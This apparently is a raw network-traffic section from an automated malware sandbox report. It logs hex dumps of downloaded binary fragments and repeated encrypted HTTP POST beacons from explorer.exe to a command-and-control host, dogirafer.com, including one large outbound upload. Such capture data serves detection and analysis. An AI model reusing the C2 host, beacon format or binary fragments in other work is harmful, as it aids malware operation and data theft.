44 39 64 24 Data Ascii: AWHHHH_ED$ ;dHD$(Ht$(HNED$0'dE3HD$8EL-#HHAfE9d}uAfD9 tfD9$Xu;UHLIGtIDH+HIu3HL$@APIYHT$@IJDHHtJ&AfD9d$
2024-12-03 16:45:16 UTC	1369	IN	Data Raw: 85 d8 01 00 00 1b c3 53 2b 48 89 95 e0 01 00 00 c7 85 f0 01 00 00 f2 cb 55 df 48 89 95 f8 01 00 00 c7 85 08 02 00 00 4a 47 2d d5 48 89 95 10 02 00 00 c7 85 20 02 00 00 57 12 a2 8a 48 89 95 28 02 00 00 c7 85 38 02 00 00 39 1e f1 72 48 89 95 40 02 00 00 c7 85 50 02 00 00 21 d0 52 45 48 89 95 58 02 00 00 c7 85 68 02 00 00 7a 8e 25 e9 48 89 95 70 02 00 00 c7 85 80 02 00 00 a4 1a 86 d0 48 89 95 88 02 00 00 c7 85 98 02 00 00 14 31 8b 23 48 89 95 a0 02 00 00 c7 85 b0 02 00 00 07 77 19 f5 48 89 95 b8 02 00 00 c7 85 c8 02 00 00 4d 11 46 05 48 89 95 d0 02 00 00 c7 85 e0 02 00 00 02 91 78 2d 48 8d 05 d2 3d 0c 00 48 89 95 e8 02 00 00 48 89 85 f0 02 00 00 48 8d 0d 2d 3f 0c 00 48 8d 05 ae 3d 0c 00 c7 85 f8 02 00 00 df 86 ef 27 48 89 85 08 03 00 00 48 8d 05 a6 3d 0c 00 Data Ascii: S+HUHJG-H WH(89rH@P!REHXhz%HpH1#HwHMFHx-H=HHH-?H='HH=
2024-12-03 16:45:16 UTC	1369	IN	Data Raw: 00 00 61 bc 1d 14 48 89 95 48 06 00 00 c7 85 58 06 00 00 cb a6 9c f4 48 89 95 60 06 00 00 c7 85 70 06 00 00 fd 53 ca 1c 48 89 95 78 06 00 00 c7 85 88 06 00 00 8d bf 40 ab 48 89 95 90 06 00 00 c7 85 a0 06 00 00 02 91 d8 59 48 89 95 a8 06 00 00 48 8d 05 1c 3a 0c 00 c7 85 b8 06 00 00 ce d5 eb c9 48 89 85 b0 06 00 00 48 8d 5c 24 28 48 8d 05 07 3a 0c 00 48 89 95 c0 06 00 00 48 89 85 c8 06 00 00 33 ff 48 8d 05 f8 39 0c 00 c7 85 d0 06 00 00 9f 60 3f 3d 48 89 85 e0 06 00 00 48 8d 05 e8 39 0c 00 48 89 85 f8 06 00 00 48 8d 05 ea 39 0c 00 48 89 85 10 07 00 00 48 8d 05 d4 39 0c 00 48 89 85 28 07 00 00 48 89 95 d8 06 00 00 c7 85 e8 06 00 00 9a f6 2b d8 48 89 95 f0 06 00 00 c7 85 00 07 00 00 48 29 27 75 48 89 95 08 07 00 00 c7 85 18 07 00 00 19 9c f3 81 48 89 95 20 07 Data Ascii: aHHXH`pSHx@HYHH:HH\$(H:HH3H9`?=HH9HH9HH9H(H+HH)'uHH
2024-12-03 16:45:16 UTC	1369	IN	Data Raw: 00 00 00 4d 85 c0 0f 84 84 00 00 00 48 8b 41 18 48 39 41 10 72 22 48 03 c0 ba 0f 00 00 00 48 3b c2 48 0f 47 d0 48 81 fa c0 03 00 00 77 62 e8 78 00 00 00 83 f8 ff 74 58 49 83 c8 ff 49 ff c0 42 80 3c 06 00 75 f6 48 8b d6 48 8b cf e8 32 01 00 00 48 85 c0 75 3a 48 8b 6f 10 48 83 ca ff 48 ff c2 80 3c 16 00 75 f7 48 8b ce e8 c4 fe ff ff 48 8b 0f 48 89 04 e9 48 8b 07 48 83 3c e8 00 74 10 48 8b 47 08 4c 89 34 e8 48 ff 47 10 33 c0 eb 03 83 c8 ff 48 8b 6c 24 30 48 8b 74 24 38 48 8b 7c 24 40 48 83 c4 20 41 5e c3 cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 48 83 39 00 48 8b f2 48 8b d9 75 1f 48 83 79 08 00 74 1f 83 c8 ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 48 83 79 08 00 74 e1 48 85 f6 74 dc 48 8b ee 48 c1 e5 03 48 8b Data Ascii: MHAH9Ar"HH;HGHwbxtXIIB<uHH2Hu:HoHH<uHHHHH<tHGL4HG3Hl$0Ht$8H\|$@H A^H\$Hl$Ht$WH H9HHuHytH\$0Hl$8Ht$@H _HytHtHHH
2024-12-03 16:45:16 UTC	1369	IN	Data Raw: 1a 84 d2 74 23 80 fa 5c 75 0b 48 ff c0 48 89 01 80 38 00 74 13 48 ff 01 48 8b 01 8a 10 80 fa 22 75 df 48 ff c0 48 89 01 48 8b 11 80 3a 00 75 03 33 c0 c3 49 2b d0 49 8b c9 48 83 ea 02 e9 3c fd ff ff 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 48 83 fa 13 76 07 33 c0 e9 6c 01 00 00 48 8b 01 0f be 08 e8 4b 8e 08 00 33 db eb 0e 48 ff 07 48 8b 07 0f be 08 e8 39 8e 08 00 85 c0 75 ee 48 8b 17 80 3a 22 0f 84 06 01 00 00 80 3a 2d 0f 84 f3 00 00 00 80 3a 2f 7e be 80 3a 39 0f 8e e5 00 00 00 80 3a 5b 0f 84 ce 00 00 00 80 3a 66 74 5a 80 3a 6e 74 1b 80 3a 74 74 50 80 3a 7b 75 98 48 8d 56 01 48 8b cf e8 11 01 00 00 e9 fa 00 00 00 41 b8 04 00 00 00 48 8d 0d 1f 0f 0b 00 e8 da 8e 08 00 85 c0 0f 85 dd 00 00 00 48 83 07 04 8d 48 10 e8 3e 55 08 00 48 85 c0 Data Ascii: t#\uHH8tHH"uHHH:u3I+IH<H\$Ht$WH HHHv3lHK3HH9uH:":-:/~:9:[:ftZ:nt:ttP:{uHVHAHHH>UH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49918	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:20 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hidViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:22 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2BkFYYFgWjMa8bwpuX6nM9TbB3UIN2pNJb3NHLAYToJ%2Fwrrxq54yC6z25K3rZmyzcb8wQw0BLoBiTDY3jvCUDR%2By55vGxgOWEHIEQCUEaaDDh5DL%2BCuWHyql3TJQI4WW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec506cd4f8a42e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2087&min_rtt=2080&rtt_var=794&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1366401&cwnd=241&unsent_bytes=0&cid=e248a7a8eefacf80&ts=1622&x=0"
2024-12-03 16:45:22 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 79 79 65 51 4d 43 33 32 6f 70 75 59 78 6e 63 6a 47 62 69 67 33 4a 4a 4f 30 33 56 42 69 6e 43 5a 2f 69 31 76 43 48 4c 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 49 6b 34 70 66 5a 76 6c 37 46 30 71 43 62 47 35 73 4b 52 47 75 70 4b 73 6f 4d 34 2f 37 45 35 52 48 32 70 4f 36 73 53 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 45 77 42 4f 76 6c 49 42 70 2b 62 72 2f 47 66 48 4d 70 35 73 74 41 35 31 50 66 44 42 78 42 37 45 41 2f 4d 6c 77 4c 4f 49 7a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 57 51 4a Data Ascii: 150PyyeQMC32opuYxncjGbig3JJO03VBinCZ/i1vCHLZmmcphSGpB6yiJiVjA1nIk4pfZvl7F0qCbG5sKRGupKsoM4/7E5RH2pO6sSnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcEwBOvlIBp+br/GfHMp5stA51PfDBxB7EA/MlwLOIzMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1WQJ
2024-12-03 16:45:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49926	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:23 UTC	412	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hjdViRxTPtzXdZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 360 Cache-Control: no-cache
2024-12-03 16:45:23 UTC	360	OUT	Data Raw: 4c 47 37 5a 48 5a 37 76 6a 4b 64 72 4e 6c 57 69 33 44 4b 48 6b 7a 55 6c 53 54 50 52 66 58 71 73 4e 36 33 72 7a 32 2b 7a 42 6c 54 6f 34 52 4f 44 30 52 61 6b 6e 4c 32 57 36 30 70 72 57 52 31 66 66 75 71 2f 67 79 42 52 56 76 48 6d 32 4b 4a 77 35 63 44 59 30 6f 4a 74 70 46 68 53 65 32 4a 4d 35 72 66 42 63 56 52 70 53 32 63 53 5a 51 72 49 75 5a 50 4f 4d 54 75 6b 36 43 77 61 4e 36 6c 59 7a 4c 67 6b 2f 56 4f 44 77 36 71 44 61 78 77 62 76 7a 4f 37 57 58 53 71 65 38 68 4f 64 37 53 67 65 48 5a 32 44 75 6d 71 48 48 68 71 6a 75 38 34 70 43 75 48 53 45 73 75 36 30 6c 44 51 67 56 4c 5a 39 36 44 4a 70 76 4c 5a 6a 32 47 4b 7a 50 67 55 6c 54 2b 51 30 45 78 4f 6a 4c 6f 35 6a 45 6a 5a 5a 49 65 6c 73 69 76 77 6f 70 4b 48 70 44 54 76 5a 33 68 59 36 73 71 48 4e 66 78 4c 58 47 Data Ascii: LG7ZHZ7vjKdrNlWi3DKHkzUlSTPRfXqsN63rz2+zBlTo4ROD0RaknL2W60prWR1ffuq/gyBRVvHm2KJw5cDY0oJtpFhSe2JM5rfBcVRpS2cSZQrIuZPOMTuk6CwaN6lYzLgk/VODw6qDaxwbvzO7WXSqe8hOd7SgeHZ2DumqHHhqju84pCuHSEsu60lDQgVLZ96DJpvLZj2GKzPgUlT+Q0ExOjLo5jEjZZIelsivwopKHpDTvZ3hY6sqHNfxLXG
2024-12-03 16:45:25 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3YdMCNRYpIRfCXKhPXi6bhBfVHj0hJL%2F6tTbADEcG%2B3ffxxhhDTXbothgtawGFz603M4RhAELZMnpZCmOmfzdLTghgO58p5SKU7WDOO%2B25ZuCLTbWoFZrzPQ87N7aOjH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec506dfe85d42ea-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2109&min_rtt=1666&rtt_var=1511&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1432&delivery_rate=560353&cwnd=143&unsent_bytes=0&cid=ce72cb35c067b38a&ts=1579&x=0"
2024-12-03 16:45:25 UTC	138	IN	Data Raw: 38 34 0d 0a 4d 79 6d 65 51 73 53 78 33 34 70 6a 59 78 6e 51 67 57 36 73 7a 6e 56 4a 4f 6b 50 66 44 55 36 70 61 50 2b 33 76 69 50 49 4b 52 69 62 6e 6d 58 35 31 32 65 2f 36 76 76 67 75 54 35 6d 4a 67 73 6a 65 35 76 6f 68 31 67 72 5a 37 61 32 74 71 4d 4a 74 5a 44 6a 6d 66 49 35 36 43 6c 56 47 47 5a 46 67 4d 43 6d 4e 6c 41 55 45 77 77 44 42 51 2b 7a 34 4d 6a 49 52 41 33 53 73 6d 68 49 59 4d 31 65 2b 39 42 58 0d 0a Data Ascii: 84MymeQsSx34pjYxnQgW6sznVJOkPfDU6paP+3viPIKRibnmX512e/6vvguT5mJgsje5voh1grZ7a2tqMJtZDjmfI56ClVGGZFgMCmNlAUEwwDBQ+z4MjIRA3SsmhIYM1e+9BX
2024-12-03 16:45:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49933	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:26 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hgdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:28 UTC	790	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mYI6mo%2BnZz9BV3PQFbi4nvNpNZhYZ4Go6iVSUO3%2B%2B4ymkStIogVayaOydR%2BgDSpHY61bB65q5FDJOLfHQjMJ0%2B%2Bh5vD8Ca3wZhLESFe1yXa4YRxdnDPfryOJd6Mnl%2BRN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec506f25fb64387-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2554&min_rtt=2526&rtt_var=967&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1155977&cwnd=32&unsent_bytes=0&cid=a868660c4e65bb70&ts=1655&x=0"
2024-12-03 16:45:28 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 69 6d 61 51 63 43 33 30 49 70 6c 59 42 72 51 68 47 37 70 67 33 46 4b 4f 30 37 52 44 55 36 6c 61 50 79 33 75 43 54 4b 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 42 74 49 6b 41 6a 65 5a 47 4f 69 31 73 6a 44 72 61 2f 74 75 30 4a 75 70 4b 74 6f 38 6c 52 35 53 46 56 48 32 46 4c 36 6f 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 48 45 63 41 31 41 65 72 6e 54 68 73 52 62 62 66 44 65 33 56 68 34 59 5a 47 37 46 4c 5a 44 58 5a 41 69 30 34 39 4e 46 30 41 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 50 4a 52 51 5a Data Ascii: 150PimaQcC30IplYBrQhG7pg3FKO07RDU6laPy3uCTKKRib7xuPoA21j4bUizBtIkAjeZGOi1sjDra/tu0JupKto8lR5SFVH2FL6o+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzHEcA1AernThsRbbfDe3Vh4YZG7FLZDXZAi049NF0AcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOPJRQZ
2024-12-03 16:45:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49940	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:29 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hhdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:31 UTC	791	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2BD4IGzEkBdE%2BHWCKhJdhtS57%2Ff%2B9462mRgKHG48ZUCLay5ud2n05EESd%2B%2FIrwKFW8JnGjoIGku17DY0TR71ffGeLLqEZx3ukR%2BrmO54oLqsRfppsgVqJc1mVDnsBbVP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec50704da734374-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2587&min_rtt=1835&rtt_var=2193&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=371785&cwnd=218&unsent_bytes=0&cid=9365a87adbf3a869&ts=1603&x=0"
2024-12-03 16:45:31 UTC	339	IN	Data Raw: 31 34 63 0d 0a 4f 53 71 61 51 38 57 7a 30 49 70 68 5a 78 54 61 68 57 57 73 78 6e 52 4c 50 30 7a 51 41 6b 36 76 5a 2f 32 31 74 69 36 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 74 6a 56 72 4a 45 38 6a 66 66 7a 6d 68 31 77 71 41 4c 4c 7a 74 61 45 44 74 35 57 6d 70 61 63 2f 36 79 6c 63 46 47 4a 50 6f 2f 36 61 56 44 46 73 64 55 46 50 51 56 48 2b 70 59 43 4f 52 6e 33 45 39 6a 30 66 4a 5a 30 4b 34 71 38 38 32 67 32 36 2b 76 37 62 52 69 45 6d 73 56 58 63 49 79 50 42 46 73 6b 30 41 4f 75 4d 49 78 30 53 61 4c 37 47 65 44 30 6f 37 6f 52 47 35 31 62 56 5a 78 42 41 67 55 6f 31 4d 31 6c 45 41 37 62 6c 49 75 66 36 58 54 57 4d 49 6e 61 74 56 58 36 63 49 68 51 63 50 79 58 6a 7a 41 68 31 54 71 4e 65 68 73 36 62 33 72 52 4a 4e 4e 62 46 78 76 62 72 50 2f 56 57 51 35 Data Ascii: 14cOSqaQ8Wz0IphZxTahWWsxnRLP0zQAk6vZ/21ti6AWB/S4BKLswqykcfTtjVrJE8jffzmh1wqALLztaEDt5Wmpac/6ylcFGJPo/6aVDFsdUFPQVH+pYCORn3E9j0fJZ0K4q882g26+v7bRiEmsVXcIyPBFsk0AOuMIx0SaL7GeD0o7oRG51bVZxBAgUo1M1lEA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbrP/VWQ5
2024-12-03 16:45:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49948	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:32 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hudViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:45:34 UTC	783	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SHRQlAagGNd2hhy8She5wOBguUuhrGMSxsjEDHq%2BE5HukxjPJXKwPTzy9QK3LVf1Zvt4JRWbHStAYVo8udMBa25rSD8ya1cSAYkFrq37Glk2zvU3N5T6V%2B%2FUjqbeipRk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec50717be4fc477-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2737&min_rtt=2590&rtt_var=1266&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=774125&cwnd=173&unsent_bytes=0&cid=9eccdf9714059121&ts=1676&x=0"
2024-12-03 16:45:34 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4d 79 71 65 54 4d 71 33 30 49 70 69 61 68 7a 61 68 47 54 70 67 33 4e 4c 4d 30 33 54 42 79 48 43 62 50 2b 79 76 69 62 4f 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 49 30 55 6f 65 70 62 67 37 46 6f 6c 43 37 4f 2f 74 71 4e 47 74 4a 71 6d 70 73 45 2f 67 69 64 55 46 57 4a 4f 35 73 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 46 4d 77 31 44 4f 33 72 4b 58 4d 5a 62 62 66 41 66 33 63 76 71 34 4e 42 36 31 58 5a 44 68 73 70 67 45 34 36 4f 46 6f 49 50 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 46 55 51 70 Data Ascii: 150MyqeTMq30IpiahzahGTpg3NLM03TByHCbP+yvibOYGmcphSGpB6yiJiVjA1mI0Uoepbg7FolC7O/tqNGtJqmpsE/gidUFWJO5sHsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FMw1DO3rKXMZbbfAf3cvq4NB61XZDhspgE46OFoIP8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfFUQp
2024-12-03 16:45:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49956	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:45:35 UTC	414	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hvdViRxTPtzGAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 12228 Cache-Control: no-cache
2024-12-03 16:45:35 UTC	12228	OUT	Data Raw: 4c 48 54 64 46 35 33 74 6a 37 77 78 62 6d 69 35 78 51 36 78 71 48 4d 55 61 45 6d 44 54 6c 6a 59 4d 35 2f 4c 79 31 69 4b 4e 33 6a 4c 33 41 33 35 74 79 61 35 68 5a 69 70 34 7a 56 71 57 44 52 39 65 75 69 59 38 43 39 31 61 38 57 32 2b 2f 56 35 77 65 7a 47 77 38 6c 69 6c 46 4a 51 53 78 38 55 6e 6f 62 5a 51 6c 64 48 61 6c 51 2b 53 48 44 4a 35 5a 65 78 46 52 4f 65 7a 52 74 4b 4e 72 51 42 78 71 67 55 38 30 79 2b 32 4e 65 6c 41 77 6b 52 67 41 4f 56 65 48 6d 56 61 72 74 43 5a 62 6d 2b 66 56 68 34 42 4d 33 46 41 77 52 50 6f 74 51 50 6e 44 61 4a 62 33 4d 62 30 69 46 71 5a 69 4a 37 4f 74 76 38 47 65 72 63 61 45 66 45 4c 55 36 77 5a 48 6a 76 54 67 38 66 48 79 76 4c 38 43 70 36 61 72 59 35 6f 4a 53 41 71 34 64 35 49 50 53 69 70 34 75 4a 58 49 59 57 50 2b 53 6e 45 6d 58 Data Ascii: LHTdF53tj7wxbmi5xQ6xqHMUaEmDTljYM5/Ly1iKN3jL3A35tya5hZip4zVqWDR9euiY8C91a8W2+/V5wezGw8lilFJQSx8UnobZQldHalQ+SHDJ5ZexFROezRtKNrQBxqgU80y+2NelAwkRgAOVeHmVartCZbm+fVh4BM3FAwRPotQPnDaJb3Mb0iFqZiJ7Otv8GercaEfELU6wZHjvTg8fHyvL8Cp6arY5oJSAq4d5IPSip4uJXIYWP+SnEmX
2024-12-03 16:45:36 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:45:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMJvyqiKdc3ikEh1t2rn2VbuRhDPu9rMSuDDNZYv9mSbOyIeZ0Yq%2BM0X9tYWDMiUr6NFK%2BDYnQnzO4EwsAwDyVubJsAPga17Ev03eRA8g8Ky7ORs4eF%2Fl9WXECJ6oLMC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec50728ab068c1b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1778&rtt_var=690&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13324&delivery_rate=1559829&cwnd=210&unsent_bytes=0&cid=65274decc1260858&ts=1557&x=0"
2024-12-03 16:45:36 UTC	584	IN	Data Raw: 32 34 34 0d 0a 4f 53 6d 66 52 4d 53 7a 33 59 70 6a 61 78 72 63 6a 47 62 6f 67 33 39 49 4f 6b 76 56 42 53 6e 43 61 2f 71 30 76 69 50 4f 5a 6d 6d 63 70 6d 50 35 32 47 37 59 36 76 4b 47 74 44 42 75 49 55 34 6a 65 74 2f 6a 69 31 59 6a 43 4c 72 51 74 36 6b 4a 73 5a 58 6a 6d 66 49 35 36 79 52 57 48 47 4a 4f 67 4d 75 6f 4e 6c 6f 54 45 30 46 4c 44 51 43 38 35 63 4c 45 49 32 76 5a 74 32 6c 4d 59 4d 73 55 69 74 64 76 68 68 66 74 70 61 62 47 62 58 42 6d 39 55 7a 6d 48 53 53 4f 45 63 45 32 44 65 37 69 4b 58 4d 54 61 62 66 44 66 6e 49 75 71 37 70 38 36 46 72 66 44 52 39 45 67 69 59 31 4e 56 4d 41 50 49 2b 48 44 4a 2b 61 45 7a 58 47 66 6a 53 47 45 44 32 66 4e 51 4a 4c 59 54 36 48 74 46 6f 71 47 75 56 46 33 5a 47 70 78 50 63 5a 63 4a 48 66 38 34 44 67 50 76 35 61 52 70 Data Ascii: 